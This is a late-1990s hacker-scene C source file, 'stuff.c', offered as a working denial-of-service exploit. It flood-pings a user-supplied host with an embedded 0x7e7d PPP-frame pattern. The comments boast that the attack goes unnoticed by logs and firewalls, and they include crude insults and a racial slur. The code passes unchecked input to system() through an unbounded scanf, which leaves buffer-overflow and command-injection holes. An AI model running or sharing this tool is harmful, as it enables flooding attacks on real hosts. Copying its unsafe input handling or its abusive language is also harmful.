/* Name: stuff.c v1.0
   Author: Cyber_Bob
   Made: Pico 3.4 (very l33t scr1pt maker y0 ;)
   Compiled: linux 2.2.10 i586 (red hat 5.2)
             gcc version 2.7.2.3
             gcc stuff.c -o stuff
    Well... Here's another simple exploit that works extremely well... as
   always. I had like this phat idea and stuff to like give some icmp's
   some serious overhead by sending an illegal character for ppp frames
   to people on the net inside of an ICMP. Damn... I'm tellin you mo fo's!
   If ping isn't fucking useful then I'll be a kick start dildo! Anyway..
   a few warning for people that don't know too much about this shit.
   1: It's a PPP exploit get it? If you're sending using a PPP connection
      you're gonna get just as fucked up as the person your tryin to fuck
      up... So don't go and be a dumb ass and try to attack somebody with
      your little 56 K connection.
   2: It doesn't spoof and if anybody logs it, it'll look like a normal
      ping (ICMP TYPE 8 if you wanna firewall it) so they probably wont
      notice you're trying to exploit thier PPP connection. Since Conseal
      PC Lamerwall only prints partial ICMP headers they're not going to
      notice the 0x7e7d pattern which has been imbedded. And unless you're
      attacking some linux guru they're prolly not going to notice the
      extra overhead in the icmp's they're recieving...
   3: No more warnings... Use common sense... Don't rip my code or
      I'll eat your family pets.

   [Shoutz] go to the #NEUA and #NukeZ crew on Undernet..
   [Shoutz/People] L^WaRrioR for testing this shit.. *ahem* =)
                   trunck for letting L^WaRrioR test this shit =))))
                   DePhAzEr for being my nigga (as always ;)
                   and myself for.... something....

   [Fuck you's] go to #ViRii on Undernet...
                (#neua own's your asses, yadda yadda yadda... FUCK YOU)

   R2-D2 Sucks ass... You're owned, etc... so on and so forth...

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

main()
{
  char command[145] = "/bin/ping -f -p 7e7d7e7d7e7d7e7d7e -s 50 ";
  char host[100];
  puts("\n\n\t\tSTUFF.C   -   Cyber_Bob");
  puts("\t\t       v1.0       ");
  printf("\n\n\n\nEnter Hostname: ");
  scanf("%s",host);
  strcat(command, host);
  puts("\n\n\n\nNow bombing the shit out of...\n-");
  printf("%s\n\n\n", host);
  puts("\n\n\nPress CTRL +C to stop.\n");
  system(command);
  return 0;
}